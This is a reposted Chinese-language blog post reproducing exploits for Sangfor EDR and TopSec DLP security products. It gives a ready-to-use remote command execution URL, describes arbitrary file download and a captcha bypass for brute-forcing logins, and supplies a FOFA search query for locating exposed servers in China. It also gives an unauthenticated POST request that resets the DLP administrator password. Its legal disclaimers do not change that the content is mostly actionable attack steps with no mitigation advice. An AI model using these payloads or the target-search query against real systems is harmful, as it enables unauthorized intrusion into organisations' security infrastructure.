【漏洞日記】深信服EDR 吾還沒見過,就聽說被人日穿了


【漏洞日記】深信服EDR 吾還沒見過,就聽說被人日穿了

 

原創:Agan ' 

原文鏈接:https://blog.csdn.net/God_XiangYu/article/details/108068029

 

當你的才華

還撐不起你的野心時

那你就應該靜下心來學習

 


目錄

0x01 深信服EDR 長啥樣?

0x02 深信服EDR RCE

0x03 漏洞簡單簡單利用方法

  任意執行命令

  Linux 讀取文件內容命令

  任意文件下載漏洞復現

  驗證碼繞過

  友情提示:不是自己公司的服務器不要去試,你任何的動作,別人都知曉,人外有人,天外有天,且行且珍惜... ...

0x04 FoFa 搜索相關漏洞服務器

0x05 批量利用方法

分析漏洞原文章

0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授權訪問導致越權修改管理員密碼

 

 


  本來忙的都沒時間看文章,沒時間干其它的事,但還是想寫一波復現文章,主要還是深信服的終端復現,誰讓... ..

  還迷迷糊糊的就聽到爆了好多0day,感覺不簡單,別問我,我也不清楚,也不敢多少什么,牽制到太多.. .. ,參考了公眾號和一些師傅們的思路和復現文章,自己再復現一下看看,請勿用作犯罪使用,網絡不是法外之地,請珍惜生命,勿觸犯法律... ...

本次爆0day 列表:

1. 天擎EDR
2. 深信服VPN
3. 深信服EDR
4. 天融信DLP 

其中最慘的當屬深信服(每年都躺槍,都哭了)

 

0x01 深信服EDR 長啥樣?

 

0x02 深信服EDR RCE

  這樣?執行了... ...,不清楚是不是后門... ..,咋不敢亂猜測,別看... ...CSDN可能也有用。牛逼
 

0x03 漏洞簡單簡單利用方法

任意執行命令

查看當前路徑
  再看看當前路徑下有哪些文件

Linux 讀取文件內容命令

more和less一般用於顯示文件內容超過一屏的內容,並且提供翻頁的功能。
more比cat強大,提供分頁顯示的功能,less比more更強大,提供翻頁,跳轉,查找等命令。
而且more和less都支持:用空格顯示下一頁,按鍵b顯示上一頁。下面詳細介紹這3個命令。


1)cat 后面跟要查看的文件,文件內容全部輸出到屏幕,
2)more 文件內容或輸出查看工具;
  more 是我們最常用的工具之一,最常用的就是顯示輸出的內容,然后根據窗口的大小進行分頁顯示,然后還能提示文件的百分比;
3)less 查看文件內容

用cat 命令查看,哦吼不行,用less 也還是不想,哦吼用more OJBK,可以了

https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=more%20/XXXXX/l.php

 

任意文件下載漏洞復現

下載一個存在的文件,你懂我的意思吧?可以下載任意文件,不限制目錄哦

https://xxx.xxx.xxx:9443/tool/log/a

 

驗證碼繞過

部分代碼如下:
// 校驗驗證碼
if (!ldb_run_at_console()) {
	if (isset($_REQUEST["captcha"])
		|| $_REQUEST["captcha"] != base64_decode("M...
		echo "<font color='red'><b>驗證碼不對,請輸入..."
		return;
	}
}

  

先輸入幾次錯誤密碼,把驗證碼弄出來后,開啟Burp(抓包工具)爆破密碼即可,只要驗證碼第一次輸入對后不為空,即可繞過
   
 
  如何去找有漏洞的呢?別說是我告訴你們的哦,其中一種方法就是如下,我反正不敢日,請勿嘗試,非法攻擊是犯法的,如上寫的利用方式比較細致,請誤拿去觸犯法律,如果發生任何結果,都於作者無關
 

友情提示:不是自己公司的服務器不要去試,你任何的動作,別人都知曉,人外有人,天外有天,且行且珍惜... ...

 

0x04 FoFa 搜索相關漏洞服務器

Fofa:
          title="終端檢測響應平台" && country="CN"
 
 
 

0x05 批量利用方法

網上已經放出批量利用方法了

分析漏洞原文章

 
 

0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授權訪問導致越權修改管理員密碼

網上就只有一張截圖,推測是調用了mod_pwd 修改密碼模塊時,沒有進行校驗原密碼+該api接口未授權訪問,組合利用,導致管理員密碼可被越權修改

POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1
Host:xxxx
剩下的一些參數省略.... ...
 
uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1

  

                              

 

參考文章:

                https://www.cnblogs.com/potatsoSec/p/13520546.html

                https://mp.weixin.qq.com/s/4VtJ_M0c5GZsV4CmBr9CsQ

                https://www.cnblogs.com/potatsoSec/p/13520546.html

 


 

雖然我們生活在陰溝里,但依然有人仰望星空!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM